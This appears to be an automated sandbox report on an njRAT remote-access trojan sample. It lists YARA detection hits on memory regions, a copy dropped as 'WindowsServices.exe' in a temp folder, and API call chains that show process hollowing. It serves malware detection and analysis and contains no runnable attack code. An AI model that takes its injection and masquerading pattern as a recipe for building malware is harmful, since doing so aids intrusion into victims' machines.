        Source: 00000019.00000002.1917172495.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000011.00000002.1749146703.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000001.1739321784.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000001.00000002.1341895171.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects NjRAT / Bladabindi | Author: ditekSHen
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 | Author: unknown
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects malware from disclosed CN malware set | Author: Florian Roth
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identify njRat | Author: Brian Wallace @botnet_hunter
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect njRAT in memory | Author: JPCERT/CC Incident Response Group
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identify njRat Author: Brian Wallace @botnet_hunter
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Process Stats: CPU usage > 49%
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exeCode function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: 4_2_00B8AA46 NtQuerySystemInformation
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: 4_2_00B8AA15 NtQuerySystemInformation
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 5_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,5_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 14_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,14_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 17_2_00B3AA46 NtQuerySystemInformation
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 17_2_00B3AA15 NtQuerySystemInformation
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 18_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,18_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 21_2_00D7AA46 NtQuerySystemInformation
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 21_2_00D7AA15 NtQuerySystemInformation
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeCode function: 22_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,22_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 25_2_00E8AA46 NtQuerySystemInformation
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 25_2_00E8AA15 NtQuerySystemInformation
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: 1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: 1_2_0041064D
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: 1_2_00413725
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: 4_2_04D30CD8
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: 4_2_04D30CBE
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 5_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 5_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 5_2_00413725
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 14_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 14_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 14_2_00413725
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 18_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 18_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 18_2_00413725
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 22_2_00405A10
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 22_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: 22_2_00413725
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: String function: 00404850 appears 69 times
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: String function: 00404670 appears 69 times
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: String function: 00403E10 appears 116 times
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Code function: String function: 004039C0 appears 116 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: String function: 00404850 appears 276 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: String function: 00404360 appears 60 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: String function: 00404670 appears 276 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: String function: 00403E10 appears 464 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: String function: 004039C0 appears 464 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: String function: 00403C20 appears 80 times
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Code function: String function: 004040F0 appears 60 times
        Source: iR2UtZj5vP.exe, 00000001.00000002.1341195697.0000000000444000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe, 00000001.00000003.1338882973.0000000000632000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamecaspol.exeT vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe, 00000001.00000000.1327046674.0000000000444000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe, 00000004.00000000.1338606357.0000000000444000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe, 00000004.00000002.1427053216.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe | Binary or memory string: OriginalFilenameFlowerPower.EXE vs iR2UtZj5vP.exe
        Source: iR2UtZj5vP.exe.1.dr | Binary or memory string: OriginalFilenamecaspol.exeT vs iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: mfc42.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: mscoree.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: version.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: wldp.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: profapi.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: cryptbase.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: propsys.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: edputil.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: urlmon.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: iertutil.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: srvcli.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: netutils.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: sspicli.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: wintypes.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: appresolver.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: bcp47langs.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: slc.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: userenv.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: sppc.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: apphelp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: mfc42.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: ntmarta.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: mscoree.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: version.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: wldp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: profapi.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: cryptsp.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: rsaenh.dll
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe | Section loaded: cryptbase.dll
